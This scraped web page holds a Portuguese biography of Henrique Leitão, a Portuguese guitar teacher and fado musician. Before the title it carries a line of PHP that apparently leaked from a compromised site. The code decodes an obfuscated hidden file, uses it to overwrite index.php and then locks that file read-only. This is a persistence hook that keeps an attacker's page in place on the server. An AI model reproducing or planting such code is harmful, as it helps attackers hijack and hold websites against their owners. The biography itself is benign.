$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Henrique Leitão – Guitarra Portuguesa – Conservatório Regional do Baixo Alentejo

Henrique Leitão – Guitarra Portuguesa

Nasceu a 22 de abril de 1975 no Chiado em Lisboa mas alentejano de coração bordado em Arraiolos. Desde que nasceu que ouve o seu pai que cantou mais de 50 anos, e cedo começou a cantarolar debaixo das mesas por serenvergonhado. O fado sempre fez parte do seu crescimento e aos 14 anos a guitarra portuguesa entra na sua vida de forma direta transformando-se num casamento eterno que só ele e a sua menina entendem. A sua primeira atuação como guitarrista foi aos 16 anos com o seu irmão, que ao mesmo tempo tinha começado a aprender viola, e nunca mais pararam de tocar, a maior parte das vezes juntos. As suas mais variadas experiencias musicais e a vontade de aprender todos os dias mais qualquer coisa fez com que a evolução como fadista e guitarrista fosse sempre positiva. Henrique Leitão é um lutador, divertido, sempre com ideias, teimoso, digno, com muito respeito por tudo e por todos, mas essencialmente que ama tudo o que faz. Está envolvido em projetos musicais como À Margem ( originais em português ), Terras de Rayo e Notas ao Vento ( tradicional ), Entrelinhas ( guitarra portuguesa e piano ), Adventum ( música portuguesa, brasileira e africana ), KAYA ( luso-africana ), Rio Lisboa ( música brasileira, fado e jazz ). No fado, Carlos Leitão, Carolina, Duarte, Mara, Formas de Fado ( projeto de teatro, humor, musica variada e fado ), e com mais relevância mediática, Rouxinol Faduncho ( personagem de humor do ator Marco Horácio ). Henrique Leitão fez parte do elenco artístico do Clube de Fado em Alfama, e do Marquês da Sé, também em Alfama, Colabora com a Adega Machado no Bairro alto, Casa de Linhares / Bacalhau de Molho em Alfama, e colaborou com a Adega do Miguel em Torres Vedras, Sr. Fado em Alcochete, Casa da Severa em Évora, entre outros. Está empenhado no projeto de Carlos Leitão, Rodrigo Costa Félix, Tasting Fado no Teatro Tivoli em Lisboa, e no projeto Rouxinol Faduncho, este ultimo desde Dezembro de 2006. Leciona aulas de Guitarra Portuguesas no Conservatório Regional do Baixo Alentejo, aulas particulares, é Vice Presidente da Associação Casa das Artes em Arraiolos e integra um projeto de Fado na sua divulgação e interação com os clientes do RB&B.

Com uma forma de tocar guitarra portuguesa que dança ao bater do coração, deixa na sua música uma alma que é só dele quando responde ao poema que se canta, quando respeita quem canta e quando os outros instrumentos o ajudam a ser feliz. Henrique Leitão é um apaixonado por tudo o que faz e a música faz amor com ele todos os dias.

Leave a Reply

Your email address will not be published.